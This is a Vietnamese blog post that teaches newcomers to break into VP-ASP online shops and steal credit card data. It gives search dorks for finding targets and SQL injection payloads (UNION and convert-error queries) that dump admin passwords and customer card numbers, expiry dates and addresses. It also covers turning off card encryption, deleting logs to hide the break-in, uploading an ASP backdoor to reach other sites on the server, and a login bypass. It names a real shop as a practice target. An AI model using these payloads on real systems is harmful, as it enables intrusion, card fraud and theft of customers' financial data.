Hack CC..Hack Toàn Tập..GooD For Newbie…

Hack CC..Hack Toàn Tập..GooD For Newbie…

16th Tháng giêng, 2008 | Mr. Gon | 1,443 lượt xem | 3 Ý kiến »

Các line thường gặp khi hack JET (Union)
line 559 -> 92
line 60->54
line 503 -> 48
line 868 -> 37
line 467 -> 47
line 468 -> 47
line 191 -> 56
line 184 -> 47,43,53
line 191 -> 48
line 211 -> 43
line 187 -> 43
line 59 -> 70
line 930->37
line 191=>56,48
line 188=>53,56,60
line 185=>86,43
line 202=>84,91
line 208=>48,57
line 64 =>53
line 58=>43
line 424 => 44,45
line 482 => 47
line 325 => 43
line 465 => 43,47
line 965 => 41
line 505 => 68,48
line 503 => 48,45,51
Cách biến 1 shop CC thành shop CVV
Display Orders
Display orders
2. Edit Categories
Categories
3. Edit Products
Products
4. Configure Shopping Cart —> thấy cái này ko ?
Configure Shopping Cart
5. Edit VP-ASP Tables
View and Edit tables
6. Edit Shipping
Shipping Methods
7. Sales Reports
Nháy vào sẽ thấy
1. Merchant details
2. Products 1
3. Products 2
4. Customer Information
5. Payments –> cái này
6. Shipping
nháy vào nó chọn
như sau
xallowcreditcards Yes
xallowinvalidcards No
xallowotherpayments No
xbypasscreateorderpage Yes
xcardissueNumber Yes
xcvndisplay Yes
xcvnrequired Yes
xencryptcreditcard No (cái này hình như là mã hóa cc ở shop nào mã hóa thì nó là Yes các u chỉnh sang No
Hack VPASP Toàn tập
Part I
————————————————————-

Cách tìm kiếm shop vp asp:

Đa số shop vp asp bị lỗi 3 chỗ này:
1-shopdisplaysproducts.asp?[tham số theo sau]
2-shopexd.asp?[tham số theo sau]
3-shoptellafriend.asp?[tham số theo sau]

Vì vậy khi gặp 1 shop vp asp, bạn nên thử luôn 3 chỗ này xem có bị lỗi không.

Nếu bạn chưa có shop nào để hack, thử sử dụng google để tìm kiếm: Sử dụng từ khóa inurl:[nội dung muốn xuất hiện trên url]
Nếu bạn muốn tìm chính xác hơn nữa băng cách thêm tham số sau nó, hãy sử dụng từ khóa: allinurl:[nội dung muốn xuất hiện trên url]

Cách thử lỗi:

Sử dụng dấu quote để thử: ‘
Truyền dấu ‘ đến các tham số bằng cách thêm nó vào sau giá trị của các biến. Ví dụ:
shopexd.asp?[tham số thứ nhất]=[gia tri thứ nhất]&[tham số thứ 2]=[giá trị thứ 2]&….
-> thử lỗi tham sô thứ nhất: shopexd.asp?[tham số thứ nhất]=[giá trị thứ nhất]’&….

Nếu truyền cho tham số thứ nhất và lỗi không xuất hiện, hãy thử cho tham số thứ 2.

Nếu trang đó bị lỗi, nó sẽ xuất hiện thông báo cho bạn, nhin lên dòng thông báo đó, bạn có thể nhận biết cơ sở dữ liệu của nó sử dụng là gì: Đa số chỉ có 2 dạng là Microsoft Access và SQL Server:

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ”.

/shopping/$.asp, line 365

hoặc dạng khác, như Jet Database v..v… thì nó sử dụng M Access

Cơ sở dữ liệu của shop VP ASP:

Có các table sau: affiliatelog, affiliates, billing, categories, configuration, configuration1, coupons, customerprices, customers, downloads, gifts, hackers, languages, mycompany, oitems, orders, ordertracking, pinnumbers, prodcategories, prodfeatures, products, projects, quantitydiscounts, registrant, registryitems, reviews, savedcarts, searchresults, shipmethods, suppliers, tblaccess, tbllog, tbluser, tamplates.

Những table quan trọng:

-Orders: Chứa ci ci ^ ^
-tblUser: Chứa username và pass của admin
-configuration: chứa link admin, và cấu hình cho shop

Những column của 3 table trên:

-Orders: orderid, ocustomerid, odate, orderamount, ofirstname, olastname, oemail, oaddress, ocity, opostcode, ostate, ocountry, ophone, ofax, ocompany, ocardtype, ocardno, ocardname, ocardexpires, ocardaddress, oprocessed, ocomment, otax, opromisedshipdate, oshippeddate, oshipmethod, oshipcost, oshipname, oshipcompany, oshipemail, oshipmethodtype, oshipaddress, oshiptown, oshipzip, oshipstate, oshipcountry, opaymethod, other1, other2, otime, oauthorization, oerrors, odiscount ostatus, oaffid, odualtotal, odualtaxes, odualshipping, odualdiscount, ohandling, odualhandling, coupon, coupondiscount, coupondiscount, giftcertificate, giftamountused, vatnumber, ipaddress, hackeryesno, opending, shipmessage, hearaboutus.
-> chừng này column là đầy đủ info của card: odate, oemail, oaddress, ocity, opostcode, ostate, ocountry, ophone, ocardtype, ocardname, ocardno, ocardexpires, oauthorization.

-tblUser: fldauto, fldusername, fldpassword, fldaccess, flddatabase
-> fldusername, fldpassword <– chứa username và pass admin

-configuration: id, fieldname, fieldvalue, fieldgroup, fieldyesno
-> ăn thua là fieldname và fieldvalue. Tại record thứ 16 là nơi chứa link admin . Giá trị của fieldname tại đấy là: xadminpage, còn fieldvalue thì phải hack mới biết ^ ^, yami ko phải là thầy bói ^ ^. Nhưng value mặc định của fieldvalue là: shopadmin.asp

Hack shop:

ví dụ trang sau bị lỗi: hxxp://yami.com/shopdisplayproducts.asp?Cat=book&catid=3

Lỗi ở tham số thứ 2.

Đối với M Access:

-Tìm username và pass của admin:

code: %20union select 1 from tbluser’

hxxp://yami.com/shopdisplayproducts.asp?Cat=book&catid=3%20union select 1 from tbluser’

Và các shop thì ko bao giờ chỉ có 1 column trong db nên chắc chắn nó sẽ báo:

The number of columns in the two selected tables or queries of a union query do not match.

Đa số các cột thường lớn hơn 30, nên tôt nhất là thử từ số 30:

code: %20union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30 from tbluser’

mục đích đánh số thứ tự, chẳng qua là chỉ để phân biệt các column với nhau, nên bạn không cần phải để ý rằng: “Liệu mình có gõ theo đúng thứ tự chưa…” Thậm chí bạn có thể không cần phải gõ theo thứ tự: %20union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1 from tbluser’
Nhưng khi phát sinh lỗi cần thiết thì lại không phân biệt được column nào mà thôi.

Tiếp tục: hxxp://yami.com/shopdisplayproducts.asp?Cat=book&catid=3%20union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30 from tbluser’

Nếu lại hiện ra lỗi trên thì nghĩa là chưa đúng số column cần thiết, bạn phải thêm vào, bây giờ tăng lên 31, nếu vẫn chưa đúng lại tăng lên 32 … cho đến khi ko còn lỗi, mà thay vào đó…, bạn hãy chú ý, sẽ có những con số rất lạ, xuất hiện bất thường trên trang web này. Ví dụ như 4, 22 hay bấy kì số nào…(đưong nhiên những số này phải là những số mà bạn đã type trên code)

Ví dụ trên web xuất hiện số 4 và 3. Mình sử dụng số 3 cho việc khai thác u va p của admin. Nhìn lên code, tìm chỗ nào có số 3 rồi thay bằng: fldusername%2b’/’%2bfldpassword.
code: %20union select 1,2,fldusername%2b’/’%2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37 from tbluser’

Nhấn enter và chỗ số 3 bất thường đó sẽ biến thành username/password ^ ^

-Tìm link admin:

link mặc định là shopadmin.asp, thử thay shopdisplayproducts.asp… thanh shopadmin.asp. Nếu không được thi… đành tự kiếm thôi

và nó nằm ở đâu, như ở trên đã nói nó nằm tại bảng configuration:
vẫn giữ nguyên số cột mà bạn đã khai thác được, thay column đầu bằng fieldname=’xadminpage’, thay column lỗi-muốn hiển thị bằng fieldvalue (ở đây là số 3)

%20union select fieldname=’xadminpage’,2,fieldvalue,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37 from configuration’

1 là bạn sẽ có link admin, 2 là sẽ gặp dòng thông báo này:

The Microsoft Jet database engine cannot find the input table or query ‘configuration’. Make sure it exists and that its name is spelled correctly.

Nó báo thế nghĩa là không có bảng config -> thằng admin đã xóa bảng confing và hết lấy link admin

Nếu bạn không có được link admin, bạn vẫn có thể get cici như thường, bằng cách truy vấn table orders.

code (cũng dán tại column số 3): %20union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7 from orders’

Thay số 3 bằng cái này: odate%2b’/’%2bofirstname%2b’/’%2bolastname%2b’/’%2boaddress%2b’/’%2bocity%2b’/’%2bostate%2b’/’%2b
opostcode%2b’/’%2bocountry%2b’/’%2bophone%2b’/’%2bocardno%2b’/’%2bocardname%2b’/’%2bocardexpires%2b’/’%2boauthorization

Nếu không hiện gì ra, nghĩa là shop đó không có cici ^ ^

- Hack Pass thứ 2:

Nếu bạn có link admin, nhưng shop này có tới 2 pass: Kiếm đâu ra pass thứ 2 bây giờ?

Không có gì khó, nhưng bạn phải xem trang đó có bị lỗi tại page: shopexd.asp hay không, nếu không có lỗi tại đó thì… khỏi kiếm pass 2 lun ^ ^.

Cách hack như trên, giả sử tại page này column 20 bị lỗi

Dùng code như khi kiếm link admin tại chỗ này:
%20union select fieldname=’xadminpage’,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,fieldvalue,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37 from configuration’

Rồi, nếu ok nó sẽ sổ ra mã nguồn asp của trang admin, và bạn sẽ nhìn thấy pass 2 tại dòng lênh: Const SecondPassword=”pass 2″

Tiếp, nếu bạn muốn tìm link admin tại page này thì phải dùng code sau:
%20union select fieldname=’xadminpage’,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,left(fieldvalue,9),21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37 from configuration’

nếu nó vẫn ra mã nguồn, thì nghĩa là số kí tự của link admin nhỏ hơn 9 hoặc bằng 9, bạn thay 9 bằng số 7. -> giả sử nó sẽ hiện ra thế này: shoa.as Nhìn thể này thì đủ biết link admin là gì rồi. Còn nếu dùng code trên mà nó chưa hiện ra dấu . thì bạn chưa thể khẳng định được, thì hãy tăng lên, thay 9 bằng 11 hoặc 12 v..v…. Cứ thế.

Part II
————————————————–

-Shop VP ASP sử dụng SQL Server

Không giống như MS Access, SQL Server có một table mặc định chứa tất cả tên của table và column của cơ sở dữ liệu đó. Table đó tên là: information_schema

Các trang buôn bán, ng ta không phải ai cũng biết lập trình web nên có thể họ mua bất kì script của một cá nhân hoặc một công ty nào đó, giống như script của vp asp vậy. Có thể bạn biết shop đó hiện đang dùng script gì, bạn có thể mua bản đó về cài offline và nghiên cứu từ csdl đến cấu trúc site để tìm ra lỗi của nó. Xong đối với những shop dùng csdl là SQL Server thì có thể bạn không cần phải làm vậy.

Nhờ có hàm convert bạn có thể cố ý biến đổi kiểu dữ liệu của nó để gây ra lỗi. Nên cách khai thác kiểu này nhanh hơn cách dùng cho access. Và đối với access bạn phải biết trước tên của đối tượng cần truy vấn.

~~~~

code khai thác tên các table:
%20and 1=convert(int,(select top 1 table_name from information_schema.tables))–sp_password

code khai thác tên các column:
%20and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=(’[tên của table cần khai thác column]’)))–sp_password

code khai thác giá trị của các column:
%20and 1=convert(int,(select top 1 [tên column 1] %2b ‘/’ %2b [tên column 2] from tbluser))–sp_password

~~~~

Xong vì đối với shop vp asp, tên của các table và column đều đã được public cả rồi nên code sau dùng để khai thác một cách nhanh chóng.

Tìm username và pass của admin:

%20and 1=convert(int,(select top 1 fldusername %2b ‘/’ %2b fldpassword from tbluser))–sp_password

hxxp://yami.com/shopdisplayproducts.asp?Cat=book&catid=3%20and 1=convert(int,(select top 1 fldusername %2b ‘/’ %2b fldpassword from tbluser))–sp_password

Tim link admin:

%20and 1=convert(int,(select top 1 fieldname%2b’/’%2bfieldvalue from configuration where fieldname=’xadminpage’))–sp_password

Nếu không có link admin bạn có thể khai thác cc bằng cách sau:

%20and%201=convert(int,(select%20top%201%20convert (char,(odate))%2b’/’%2bofirstname%2b’/’%2bolastname%2b’/’%2boaddress
%2b’/’%2bocity%2b’/’%2bostate%2b’/’%2bopostcode%2b’/’%2bocountry%2b’/’%2bophone%2b’/’%2bocardno%2b’/’%2bocardname
%2b’/’%2bocardexpires%2b’/’%2boauthorization%20from%20orders where ocardno%20not%20in(”) and right(ocardexpires,2) not in(’05′)))–sp_password

(Đoạn code dài quá nên ngắt làm 3 phần, các bạn copy thì nhớ cẩn thận nha)

code trên có nghĩa khai thác toàn bộ thông tin của card mà có ngày hết hạn không phải là năm 2005. Mỗi khi nhận được 1 cvv, bạn copy cc number vào phần ocardno not in(”). Ví dụ bạn nhận được cái cảd 4111111111111111 thì để lấy cái tiếp theo sao không cho nó trùng lặp thi thêm vào cho ocardno not in(”,’4111111111111111′). Ngăn cách bằng dấu ,

Đoạn code trên có chỗ convert(char,(odate)) có nghĩa nó sẽ chuyển trước giá trị là day time sang kiểu char trước khi chuyển sang kiểu int. Vì nếu bạn chuyển ngay sang kiểu int thì khoảng giá trị là ngoài vùng được chọn và sẽ mang lại kết quả không mong đợi. Đó là lý do vì sao nhiều bạn hack shop qua lỗi Sql inject lại không lấy được trường ngày tháng.

Tiếp theo về pass 2. Làm sao để tìm? Sử dụng code sau, và bạn lại phải 1 lần nữa ngồi đoán số column:

%20union select top 1 1,2,3,4,5,6… from configuration

Cũng giống như cách hack đối với Access nhưng chỉ khác là có thêm top 1

Part III
———————————————————-

Khi vào login được vào quyền admin, nhiệm vụ đầu tiên của bạn là phải xóa log history đi, để thằng chủ shop không biết được có ng khác xâm nhập vào trái phép. Chọn mục Log History -> chọn lần login và địa chỉ ip của máy mình -> Xóa. Nhưng có khi bạn lại không thấy mục History đâu, và không chỉ riêng gì History mà những mục khác cũng không có. Vậy là thằng chủ shop không enable lên hoặc user của bạn không đủ quyền hạn.

Vì bạn đang nắm là quyền admin, những mục kia chẳng qua là nó đã hide đi mà thôi, nếu bạn muốn chọn một user ở mức cao hơn bạn có thể thay dòng shopadmin1.asp trên url bằng page sau: shopa_user_control.asp Vào đây bạn có thể edit và xem pass của các user, nếu muốn đăng nhập user khác, hãy clear cookie và đăng nhập lại.

Các page quan trọng:

-Xem tất cả các Order: shopa_listorders.asp
-Mục Log History: shopa_loghist.asp
-Xem quyền hạn các User: shopa_user_control.asp
-Truy vấn csdl: shopa_query.asp
-Config Shop: shopa_configlist.asp và shopa_config.asp

Khi hack được shop, ít ra bạn sẽ có được mailist, chọn mục Query hoặc xóa page shopadmin1.asp trên url và thay thế bằng page: shopa_query.asp ->Gõ vào ô query và run lệnh sau bạn sẽ có mailist: select oemail from orders

Hack lên server:

Nghe thì ghê gớm lắm xong lại rất đơn giản. Bạn vào mục Display Products và Edit bất kì một sản phẩm nào. Kéo xuống, bạn sẽ thấy dòng chữ upload images, click vào đó. Hoặc nếu không thấy, vì thăng chủ shop hơi bị khôn thì dán page này vào: shopa_upload.asp Sau đó bấm Browse… và chọn 1 con backdoor từ máy của bạn để úp lên server của nó. Nhớ là backdoor ASP nhé .

Dạo này thằng chủ shop cũng có nhiều đứa khôn lắm, nên có thể up thành công hoặc không. Upload thành công thì nó sẽ báo là Upload has been sucess… và bên dưới là đường dẫn chứa backdoor của bạn, copy và dán lên url rồi….

Lên server rồi thì tự mò nha, cũng dễ thôi ^ ^

Mà mục đích lên server là gì nhỉ? Là để tìm kiếm nhữ site shop khác cũng thuê chỗ tại server đó. Bạn sẽ có quyền tải file, dựa vào khả năng phán đoán bạn sẽ biết nó cất csdl ở đâu và down về. Khi up con này lên server rồi, thì bạn bấm up để trở ra thư mục lớn hơn, rồi nhìn lên url, bạn sẽ thấy nguyên cái đường dẫn, bạn thay đổi đường dẫn… cứ tưởng tượng đơn giản, đó là cái máy tính của bạn vậy.

Part IV
Sau khi các bạn lên server, và tìm được thư mục chứa các website thì công việc tiếp theo là phải tìm cho được đâu là cái shop để tiếp tục kiếm cici

Nếu như nó đặt tên thư mục cho mỗi site là tên gợi nhớ (domain của site) thì chắc hẳn các bạn dễ dàng gõ vào address của trình duyệt cái domain của site đó và biết nó có phải là 1 shop hay không! Nhưng nó lại không thích đặt vậy, mà lại đánh kí tự số cho từng site, hoặc đặt tên lung tung thì bạn làm thế nào để biết được domain của nó là gì? Nếu như phải down 1 vài page về, nhìn vào baner hay hình ảnh nào đó hoặc phần copyright có thể có tên miền thì quả thật là hơi mất thời gian và có thể là không tìm thấy.

Cách hữu hiệu nhất, đơn giản nhất và tốt nhất là bạn nên sử dụng google. Download 1 page về, copy phần copyright hoặc phần đặc trưng của site vào ô search của google. Bấm enter, bạn sẽ thấy được … trang bạn cần tìm.
Hoặc vào google gõ cú pháp sau:

“cụm từ đặc trưng trong page” inurl:[tên của page bạn down về]

Okie, thế là đã tìm được tên miền, và hãy tìm xem có shop nào không? Khi đã tìm ra 1 shop, dù cho shop đó cất kĩ database đến đâu, hay không có lỗi, bạn vẫn có thể lấy cc của nó được

Ví dụ, mình tìm được 1 thư mục tên A có chứa site shop. Vào trong thư mục đó, 1 là bạn có thể tìm thấy database và down về, xong nếu không thể lấy được thì hãy tìm page login admin của nó! Bạn đang ở trên server mà, nên việc tìm page của admin cũng không khó lắm. Khi đã tìm ra, username và pass ở đâu để bạn có thể đăng nhập nhỉ ??? Và shop này không hề có lỗi nào.

Đầu tiên bạn hãy down cái page admin về. Bấm vào dòng chữ “MASS TEST IN…” của con backdoor, nó sẽ liệt kê cho bạn thấy những thư mục nào bạn có thể upload file. Nhưng trước khi upload, bạn hãy sửa lại mã nguồn ở page admin.

Xác định thư mục bạn sẽ upload. Tìm trong page admin (đã save về máy và đã mở mã nguồn lên) xem có dòng include … thì thay đường dẫn cho thích hợp, để từ thư mục bạn sẽ up lên, nó có thể tìm thấy file mà bạn include. Tiếp đến tìm tù này: replace

Và bỏ hàm replace đi. Ví dụ trong code: user=replace(username,”’,’”‘). Bỏ dòng này đi, tương tự đối với những chỗ khác, tuy nhiên bạn cần phải linh hoạt hơn. Có những shop viet code sử dụng hảm replace như sau: Select * from tbl where replace(user,”’,’”‘)… Nếu như thế này thì bạn bỏ cái hàm replace thôi, và sẽ thành đoạn code như sau: select * from tbl where user…

Xong xuôi rồi thì save lại và up lên thư mục bạn đã chọn.

Ví dụ domain của shop đó là: hxxp://yami.com/

link admin chính xác là: hxxp://yami.com/admin.asp

thư mục cho phép up là images.

Link bạn up trang admin giả lên sẽ có dạng: hxxp://yami.com/images/admin.asp

Rồi! Bạn hãy gõ hxxp://yami.com/images/admin.asp vào trình duyệt và thử login

Username: ‘or”=’
Password: ‘or”=’

bấm ok và page not found ^ ^… cái này các bạn đừng lo, vì trong file include nó sẽ chỉ sang 1 trang mà admin đã đăng nhập không phải nằm trong images nên page not found cung chẳng có gì là lạ. Tuy nhiên, máy của bạn đã lưu cookie của admin nên bạn chỉ cần gõ đúng link admin: hxxp://yami.com/admin.asp. Thế là nó tự động chuyển sang trang mà bạn đã login vào admin. ^ ^ Vô được rồi thì… get cc thôi

HƯỚNG DẪN HACK SHOP BẰNG SQL INJECTION
Phần I
Tất cả những kiến thức này đều rất căn bản , Nhưng lại hết sức hữu dụng trong việc hack shop.Chỉ cần thành thạo những kiến thức này là bạn hack được cả đống shop rồi .
Để tìm site bị lỗi kiểu này đòi hỏi bạn phải có nhiều kinh nghiệm tìm lỗi và search shop như thế nào cho thật hiệu quả. Nên search shop ở xxxx.google.com hoặc xxxx.search.com Từ khoá nên dùng:allinurl:”shopdisplayproducts.asp?id=”ho� � �c search theo domain allinurl:”.com/shopdisplayproducts.asp?id= “bạn có thể thay .com bằng .net,.biz ,.us…..vv thay id bằng cat
theo tôi khi search bạn nên thêm giá trị của id= ví dụ như :allinurl:”shopdisplayproducts.asp?id=9″
Mỗi lần thay giá trị như vậy sẽ cho ra thêm nhiều kết quả mới .Sau khi search xong bạn chọn lấy một site bất kỳ ta.thêm dấu nháy đơn ‘ .
xxxxxxvictim.com/shopping/shopdisplay…asp?id=153′
Nếu ko báo lỗi, bạn hãy thử thay id bằng cat xem xxxx.victim.com/shopping/shopdisplay…sp?cat=153′

Trích: Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ”./shopping/shopdisplayproducts.asp, line 93

Oh có lỗi rồi. Bạn nhìn kỹ nhé —–> Unclosed quotation mark before the character string đối với lỗi này ta sẽ dùng and 1=convert , Còn nếu nó báo thế này

CODE
Microsoft JET Database Engine error ‘80040e14′ Syntax error in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like ‘5′%’ and hide=0 order by specialoffer desc,cname’. /shop$db.asp, line 467

Thì đây là lỗi jet Bạn hãy chuyển qua phần 2
Bây giờ ta tiếp tục :
Trích:
CODE
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ”./shopping/shopdisplayproducts.asp, line 93

Bước I:
Lấy table : đây là câu lệnh cơ bản để lấy table:
and 1=convert(int,(select top 1 table_name from information_schema.tables))–sp_password
bạn xoá dấu ‘ rồi thêm dòng query này vào phía sau
ta được như thế này
xxxxxx.victim.com/shopping/shopd…from%20informa[/url] tion_schema.tables))–sp_password
Chú ý : %20 là mã ascii của dấu cách (space) , do IE ko chấp nhận dấu cách nên nó phải chuyển sang ascii

Trích:
CODE
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘ver_Faq’ to a column of data type int./shopping/shopdisplayproducts.asp, line 93

kết quả ‘ver_Faq’ là tên của table đầu tiên trong cơ sở dữ liệu :câu lệnh lấy table tiếp theo :and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in (’ver_Faq’)))–sp_password

ta được thế nayxxxxxhttp://www.victim.com/shopping/shopd…from%20informa tion_schema.tables%20where%20table_name%20not%20in %20(’ver_Faq’)))–sp_password

Trích:
CODE
ProductsMicrosoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘coupons’ to a column of data type int./shopping/shopdisplayproducts.asp, line 93

Ta cứ lấy tiếp như vậy :

xxxxxx.victim.com/shopping/shopd…%201=convert(i[/url] nt,(select%20top%201%20table_name%20from%20informa tion_schema.tables%20where%20table_name%20not%20in %20(’ver_Faq’,’coupons’)))–sp_password

Bước II : lấy column mục đích của chúng ta là tìm thông tin liên quan đến admin , thông thường nó nằm trong các table : users, tbluser,AdminUsers……….Giả sử ở đây là tbluser
Câu truy vấn dùng để lấy column:and 1=convert(int,(select top 1 column_ name from information_schema.columns where table_name=(’tbluser’)))–sp_password

ta được thế nayxxx.victim.com/shopping/shopd…cts.asp?id=153 and 1=convert(int,(select top 1 column_ name from information_schema.columns where table_name=(’tbluser’)))–sp_password

Trích:
CODE
ProductsMicrosoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘fldauto’ to a column of data type int./shopping/shopdisplayproducts.asp, line 93

Lấy column tiếp theo:and 1=convert(int,(select top 1 column_ name from information_schema.columns where table_name=(’tbluser’) and column_name not in (’fldauto’)))–sp_password
Khi thêm code xong sẽ như thế này:
xxx.victim.com/shopping/shopd…%201=convert(i[/url] nt,(select%20top%201%20column_name%20from%20inform ation_schema.columns%20where%20table_name=(’tbluse r’)%20and%20column_name%20not%20in%20(’fldauto’))) –sp_password
Trích: Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘fldusername’ to a column of data type int./shopping/shopdisplayproducts.asp, line 93

Lấy column tiếp theo :and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=(’tbluser’) and column_name not in (’fldauto’,’fldusername’)))–sp_password
[xxx.victim.com/shopping/shopd…%201=convert(i[/url] nt,(select%20top%201%20column_name%20from%20inform ation_schema.columns%20where%20table_name=(’tbluse r’)%20and%20column_name%20not%20in%20(’fldauto’,’f ldusername’)))–sp_password

Trích
CODE
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘fldpassword’ to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93

Ok được rồi, giờ ta lấy username và password :
++++Câu truy vấn :
_Lấy username
and 1=convert(int,(select top 1 fldusername from tbluser))–sp_password
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′ [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘admin’ to a column of data type int. /shopping/shopdisplayproducts.asp, line 93———-> username là admin

_Lấy password :
and 1=convert(int,(select top 1 fldpassword from tbluser))–sp_password
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′ [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘1234′ to a column of data type int. /shopping/shopdisplayproducts.asp, line 93———-> pass là 1234

Hoặc có thể lấy cả 2 cùng 1 lúc
and 1=convert(int,(select top 1 fldusername%2b’/’%2bfldpassword from tbluser))–sp_password
%2b là mã ascii của dấu +
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′ [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘admin/1234′ to a column of data type int. /shopping/shopdisplayproducts.asp, line 93

Chú ý :Nhiều khi bạn không thể tìm thấy table tbluser hoặc users hay các table (có vẻ) liên quan đến thông tin admin .Lúc này chẳng nhẽ bạn đành lấy lần lượt các column trong từng table sao ? Chúng ta có 1 cách khác nhanh hơn đó là dùng từ khoá like
Giả sử ta cần tìm column ‘fldpassword’ mà không biết nó ở đâu .Ta thử search tại Table đầu tiên ‘ver_Faq’
Câu truy vấn như sau:
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=(’ver_Faq’) and column_name like (’%25pass%25′)))–sp_password
Bạn chú ý : câu truy vấn này sẽ trả về tên của column đầu tiên mà tên của nó có chứa chữ “pass”
Trích :
No products match your search
Oh vậy là table ‘ver_Faq’ ko có column nào mà tên của nó có chứa chữ “pass” .Đến đây chắc bạn biết làm gì tiếp, ta cứ search các table khác, table nào có nó sẽ cho ra kết quả như sau :
TríchMicrosoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘fldpassword’ to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93

Bước III:
Sau khi đã có username và password việc còn lại là tìm link admin .Ví dụ link của shop là thế này
xxxxvictim.com/shopping/shopd…cts.asp?id=153[/url]
Thì link admin có thể nằm ở
[urlxxxx.victim.com/shopping/shopadmin.asp[/url] Hoặc xxxx.victim.com/shopping/shopadmin1.asp
Nếu không được bạn hãy làm theo cách của tôi :
Ta biết column fieldvalue và fieldname chứa link admin
Column fieldvalue và fieldname thường nằm trong table configuration
Nhưng nhiều khi bạn đã lấy được tất cả table của shop nhưng vẫn không thấy table configuration , đó là vì table này đã bị rename , lúc này buộc bạn phải sử dụng tiếp từ khoá like để search column filedvalue . Cái này tôi không nói thêm nữa bạn. cứ áp dụng theo hướng dẫn ở trên.
Để lấy link admin bạn dùng câu truy vấn như sau :
and 1=convert(int,(select top 1 fieldname%2b’/’%2bfieldvalue from configuration where fieldname=’xadminpage’))–sp_password
Trích:Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘xadminpage/5h0padm1n.asp’ to a column of data type int.
/shopping/shopdisplayproducts.asp, line 93
ok link admin là 5h0padm1n.asp
Giờ thì bạn đã có shop rồi, giờ chỉ cần vào view cc nữa thôi ()
Phần II:
hack các shop jetdatabase
Đây là một ví dụ , bạn có thể thực hành ngay tại shop này
xxx.treasureshidden.com/shopp…ucts.asp?cat=9
bạn thêm vào sau 1 dấu nháy đơn ‘
xxxx.treasureshidden.com/shopping/sh….asp?cat=9′
ok báo lỗi rồi
9′ Microsoft JET Database Engine error ‘80040e14′ Syntax error in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like ‘9%’ and hide=0 order by specialoffer desc,cname’. /shop$db.asp, line 912
Bạn chú ý chỗ này nhé ———–> Syntax error in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like ‘9%’ and hide=0 order by specialoffer desc,cname’
Khi nó báo như vậy thì ta sẽ dùng union ( bạn giữ nguyên dấu ‘ nhé )
Câu lệnh như sau :
union select 1 from tbluser”having 1=1–sp_password
—->xxxx.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1 from tbluser”having 1=1–sp_password
————-%————–chú thích————-%—————-
Nếu nó báo thế này hoặc tương tự )
Microsoft JET Database Engine error ‘80040e14′ Syntax error in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and c.catdescription like ‘9′%’union select 1 from tbluser”having 1=1–sp_password and hide=0 order by specialoffer desc,cname’. /shop$db.asp, line 912
Bạn thử thay id bằng cat , thay cat bằng id hoặc xoá dấu ‘ xem sao
————————————————————————————-
Tiếp tục nhé
xxxx.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1 from tbluser”having 1=1–sp_password
Khi nó báo thế này là được rồi
Microsoft JET Database Engine error ‘80040e14′ The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 912
Lỗi vừa rồi nói rằng : có tồn tại giá trị column chứa thông tin admin
bạn cứ tiếp tục thêm số vào nhé
